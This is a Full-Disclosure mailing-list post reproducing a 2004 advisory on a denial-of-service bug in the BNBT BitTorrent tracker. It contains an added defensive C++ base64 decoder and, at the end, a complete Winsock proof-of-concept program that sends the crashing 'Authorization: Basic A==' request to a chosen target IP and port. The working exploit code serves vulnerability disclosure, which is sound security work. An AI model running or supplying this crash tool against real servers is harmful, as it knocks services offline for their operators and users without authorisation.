
[Full-Disclosure] BNBT BitTorrent Tracker Denial Of Service



See the following link, or the attached advisory.

http://fux0r.phathookups.com/advisory/sp-x12-advisory.txt

----------------------------------------
badpack3t
www.security-protocols.com
----------------------------------------
SP Research Labs Advisory x12
-----------------------------

BNBT BitTorrent Tracker Denial Of Service
-----------------------------------------

Versions:
cbtt75_20040515
Beta 7.5 Release 2 and prior versions

Vendors:  
http://bnbt.go-dedicated.com/
http://bnbteasytracker.sourceforge.net/
http://sourceforge.net/projects/bnbtusermods/

Date Released - 5.21.2004

------------------------------------
Product Description from the vendor:

BNBT was written by Trevor Hogan. BNBT is a complete port of the original Python BitTorrent tracker to C++ for speed and efficiency. BNBT also offers many additional features beyond the original Python BitTorrent tracker, plus it's easy to use and customizable. BNBT is covered under the GNU Lesser General Public License (LGPL).

--------
Details:

A specially crafted HTTP GET request which contains the header 'Authorization: Basic A==' will cause the BNBT server to crash. It may be possible to execute arbitrary code. Previous versions are also affected by this vulnerability. The bug is located in util.cpp in the Util_DecodeHTTPAuth function.
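The value in that header, "A==", is three characters long, which is not a valid base64 quantum: a decoder that trusts the length of its input and reads the bytes it expects to find is the kind of code that falls over on it. The decoder below is an added example written for this post, not BNBT's util.cpp or its Util_DecodeHTTPAuth function (whose source is not quoted here); the names strictBase64Decode and decodeHttpBasicAuth are mine. It shows the checks a hardened Basic-auth decoder needs so that a malformed value is rejected before any of it is interpreted, and it is exercised on the advisory's own "Basic A==" header next to a constructed valid one.

```cpp
#include <cstdint>
#include <iostream>
#include <string>

// Map one base64 alphabet character to its 6-bit value; -1 for anything else.
static int b64Value(char c) {
    if (c >= 'A' && c <= 'Z') return c - 'A';
    if (c >= 'a' && c <= 'z') return c - 'a' + 26;
    if (c >= '0' && c <= '9') return c - '0' + 52;
    if (c == '+') return 62;
    if (c == '/') return 63;
    return -1;
}

// Strict base64 decode (standard alphabet). Rejects input whose length is not
// a multiple of 4, '=' anywhere except the last one or two positions of the
// final quantum, and non-alphabet characters. "A==" (three characters) is
// rejected by the length check before any byte of it is interpreted.
// Returns false on malformed input; 'out' holds the decoded bytes on success.
bool strictBase64Decode(const std::string &in, std::string &out) {
    out.clear();
    if (in.size() % 4 != 0) return false;
    for (size_t i = 0; i < in.size(); i += 4) {
        int v[4];
        int pad = 0;
        for (int k = 0; k < 4; ++k) {
            char c = in[i + k];
            if (c == '=') {
                // Padding is only legal in the last quantum, positions 2 and 3.
                if (i + 4 != in.size() || k < 2) return false;
                ++pad;
                v[k] = 0;
            } else {
                if (pad != 0) return false;   // data after '=' is malformed
                v[k] = b64Value(c);
                if (v[k] < 0) return false;
            }
        }
        uint32_t bits = (uint32_t(v[0]) << 18) | (uint32_t(v[1]) << 12) |
                        (uint32_t(v[2]) << 6) | uint32_t(v[3]);
        out.push_back(static_cast<char>((bits >> 16) & 0xFF));
        if (pad < 2) out.push_back(static_cast<char>((bits >> 8) & 0xFF));
        if (pad < 1) out.push_back(static_cast<char>(bits & 0xFF));
    }
    return true;
}

// Parse an HTTP Authorization header value of the form "Basic <base64>" into
// user and password (Basic credentials decode to "user-id:password"). Every
// malformed value, including the advisory's "Basic A==", is reported as false
// rather than acted upon.
bool decodeHttpBasicAuth(const std::string &headerValue,
                         std::string &user, std::string &pass) {
    const std::string prefix = "Basic ";
    if (headerValue.compare(0, prefix.size(), prefix) != 0) return false;
    std::string decoded;
    if (!strictBase64Decode(headerValue.substr(prefix.size()), decoded)) return false;
    size_t colon = decoded.find(':');
    if (colon == std::string::npos) return false;
    user = decoded.substr(0, colon);
    pass = decoded.substr(colon + 1);
    return true;
}

int main() {
    // Constructed sample header values: the advisory's malformed one and a
    // valid one ("dXNlcjpwYXNz" is base64 for "user:pass").
    const char *samples[] = {"Basic A==", "Basic dXNlcjpwYXNz"};
    for (const char *s : samples) {
        std::string u, p;
        if (decodeHttpBasicAuth(s, u, p))
            std::cout << "accepted: user=" << u << " pass=" << p << "\n";
        else
            std::cout << "rejected malformed header: " << s << "\n";
    }
    return 0;
}
```

The design point is that every length and padding decision is made on the input as received, never on what a well-formed quantum "should" contain; a decoder written that way cannot be steered into reading past the end of a short header, whatever the caller sends.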

--------
Exploit:

Attached to this advisory is very basic PoC code which only causes the BNBT 
server to crash.

--------------
Tested on: 
WindowsXP SP1

peace out,

--------------------------
badpack3t
www.security-protocols.com
--------------------------

/****************************/
/*  PoC to crash the server  */
/****************************/

/* BNBT BitTorrent Tracker Denial Of Service
   
   Versions:
   cbtt75_20040515
   Beta 7.5 Release 2 and prior versions
  
   Vendors:
   http://bnbt.go-dedicated.com/
   http://bnbteasytracker.sourceforge.net/
   http://sourceforge.net/projects/bnbtusermods/
   
   The bug is located in util.cpp in the Util_DecodeHTTPAuth function.

   Coded and Discovered by:
   badpack3t <badpack3t@xxxxxxxxxxxxxxxxxxxxxx>
   .:sp research labs:.
   www.security-protocols.com
   5.21.2004

   This PoC will only DoS the server to verify if it is vulnerable.
 */

#include <winsock2.h>
#include <stdio.h>
#include <stdlib.h>   /* exit(), atoi() */
#include <string.h>   /* memcpy() */

#pragma comment(lib, "ws2_32.lib")

char exploit[] = 

"GET / HTTP/1.0\r\n"
"Authorization: Basic A==\r\n\r\n";

int main(int argc, char *argv[])
{
        WSADATA wsaData;
        WORD wVersionRequested;
        struct hostent  *pTarget;
        struct sockaddr_in      sock;
        char *target;
        int port,bufsize;
        SOCKET mysocket;
        
        if (argc < 2)
        {
                printf("BNBT BitTorrent Tracker DoS by badpack3t\r\n<badpack3t@xxxxxxxxxxxxxxxxxxxxxx>\r\n\r\n");
                printf("Usage:\r\n %s <targetip> [targetport] (default is 6969)\r\n\r\n", argv[0]);
                printf("www.security-protocols.com\r\n\r\n");
                exit(1);
        }

        wVersionRequested = MAKEWORD(1, 1);
        /* WSAStartup returns 0 on success and a positive error code otherwise */
        if (WSAStartup(wVersionRequested, &wsaData) != 0) return -1;

        target = argv[1];
        port = 6969;

        if (argc >= 3) port = atoi(argv[2]);
        bufsize = 1024;
        if (argc >= 4) bufsize = atoi(argv[3]);

        mysocket = socket(AF_INET, SOCK_STREAM, 0);
        if(mysocket==INVALID_SOCKET)
        {       
                printf("Socket error!\r\n");
                exit(1);
        }

        printf("Resolving Hostnames...\n");
        if ((pTarget = gethostbyname(target)) == NULL)
        {
                printf("Resolve of %s failed\n", argv[1]);
                exit(1);
        }

        memcpy(&sock.sin_addr.s_addr, pTarget->h_addr, pTarget->h_length);
        sock.sin_family = AF_INET;
        sock.sin_port = htons((USHORT)port);

        printf("Connecting...\n");
        if ( (connect(mysocket, (struct sockaddr *)&sock, sizeof (sock) )))
        {
                printf("Couldn't connect to host.\n");
                exit(1);
        }

        printf("Connected!...\n");
        printf("Sending Payload...\n");
        if (send(mysocket, exploit, sizeof(exploit)-1, 0) == -1)
        {
                printf("Error Sending the Exploit Payload\r\n");
                closesocket(mysocket);
                exit(1);
        }

        printf("Payload has been sent! Check if the webserver is dead.\r\n");
        closesocket(mysocket);
        WSACleanup();
        return 0;
}